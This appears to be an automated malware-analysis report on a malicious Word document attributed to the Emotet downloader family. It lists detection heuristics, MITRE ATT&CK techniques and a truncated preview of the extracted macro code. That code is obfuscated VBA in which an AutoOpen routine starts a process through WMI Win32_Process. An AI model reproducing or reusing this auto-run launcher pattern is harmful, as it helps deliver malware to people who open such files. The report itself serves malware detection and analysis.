MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing VBA macros. The macros utilize WMI (Win32_Process) to create new processes, a common technique for downloading and executing further malicious payloads. The ClamAV signature 'Doc.Downloader.Emotet-7431186-0' strongly suggests the Emotet family, known for its downloader capabilities.
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7431186-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7431186-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9778 bytes |
SHA-256: 30084ad08855765c9029f8f076046d0ceef19798845c620e5041bc9ce1b72215 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Hsykvjyaxp"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "Ekbicjlbpary, 0, 0, MSForms, TextBox"
Attribute VB_Control = "Qfhiehhgudrxf, 1, 1, MSForms, TextBox"
Attribute VB_Control = "Hwcyjnncvhd, 2, 2, MSForms, TextBox"
Attribute VB_Control = "Ohwjlltqcoqx, 3, 3, MSForms, TextBox"
Attribute VB_Control = "Jypmfsbflpr, 4, 4, MSForms, TextBox"
Attribute VB_Control = "Wgpvspuwut, 5, 5, MSForms, TextBox"
Attribute VB_Control = "Yxyokqts, 6, 6, MSForms, TextBox"
Attribute VB_Control = "Pzuattac, 7, 7, MSForms, TextBox"
Attribute VB_Control = "Auuntdxklobt, 8, 8, MSForms, TextBox"
Attribute VB_Control = "Nzpkrlamlwtcw, 9, 9, MSForms, TextBox"
Attribute VB_Control = "Punjxtqhcw, 10, 10, MSForms, TextBox"
Attribute VB_Control = "Uaetoghrq, 11, 11, MSForms, TextBox"
Attribute VB_Name = "Lraqsbqicn"
Attribute VB_Base = "0{F06951C8-CB00-4FF4-8A7D-410545A571D6}{686D2020-FD8A-448F-82C7-5FC2553ECA55}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Femvhkivryimg"
Function Keskzxmbbrky()
On Error Resume Next
Select Case Enlncjzccsdv
Case 2373
Ylqv2 = Log(ztlQ)
bOiI = Fix(5503 + Fix(jZmd))
Case 6
uukS79X = Chr(69)
vEfwMT = ChrW(anxGm)
Case 187536147
cDs = 329300291
Dpj = BXYsS21
End Select
nttG9vX = 199541192
For Yydxagzwjevb = 0 To 0
bEov48 = 43178593 + 36693484
If zLRq >= CHjhua Then
yzXb96fdH = Oct(2)
End If
Next
CreateObject("winmgmts:Win32_Process").Create _
_
Femvhkivryimg _
.Rlgcmxxqdu, Vdbdjmpvzrd, Wdsmhnlgslvt
Select Case Uimnpnijrc
Case 2373
Ylqv2 = Log(ztlQ)
bOiI = Fix(5503 + Fix(jZmd))
Case 6
uukS79X = Chr(69)
vEfwMT = ChrW(anxGm)
Case 187536147
cDs = 329300291
Dpj = BXYsS21
End Select
nttG9vX = 199541192
For Jceqokyxsyzha = 0 To 0
bEov48 = 43178593 + 36693484
If zLRq >= CHjhua Then
yzXb96fdH = Oct(2)
End If
Next
End Function
Sub autoopen()
On Error Resume Next
Select Case Tyokrftbzt
Case 2373
Ylqv2 = Log(ztlQ)
bOiI = Fix(5503 + Fix(jZmd))
Case 6
uukS79X = Chr(69)
vEfwMT = ChrW(anxGm)
Case 187536147
cDs = 329300291
Dpj = BXYsS21
End Select
nttG9vX = 199541192
For Tptdrhkdm = 0 To 0
bEov48 = 43178593 + 36693484
If zLRq >= CHjhua Then
yzXb96fdH = Oct(2)
End If
Next
Select Case Ppruqrbnqoqd
Case 2373
Ylqv2 = Log(ztlQ)
bOiI = Fix(5503 + Fix(jZmd))
Case 6
uukS79X = Chr(69)
vEfwMT = ChrW(anxGm)
Case 187536147
cDs = 329300291
Dpj = BXYsS21
End Select
nttG9vX = 199541192
For Wwmzhpthgllws = 0 To 0
bEov48 = 43178593 + 36693484
If zLRq >= CHjhua Then
yzXb96fdH = Oct(2)
End If
Next
Select Case Avupfhcgzjh
Case 2373
Ylqv2 = Log(ztlQ)
bOiI = Fix(5503 + Fix(jZmd))
Case 6
uukS79X = Chr(69)
vEfwMT = ChrW(anxGm)
Case 187536147
cDs = 329300291
Dpj = BXYsS21
End Select
nttG9vX = 199541192
For Yiijeleon = 0 To 0
bEov48 = 43178593 + 36693484
If zLRq >= CHjhua Then
yzXb96fdH = Oct(2)
End If
Next
Keskzxmbbrky
End Sub
Function Wdsmhnlgslvt()
On Error Resume Next
Select Case Gimusoioc
Case 2373
Ylqv2 = Log(ztlQ)
bOiI = Fix(5503 + Fix(jZmd))
Case 6
uukS79X = Chr(69)
vEfwMT = ChrW(anxGm)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.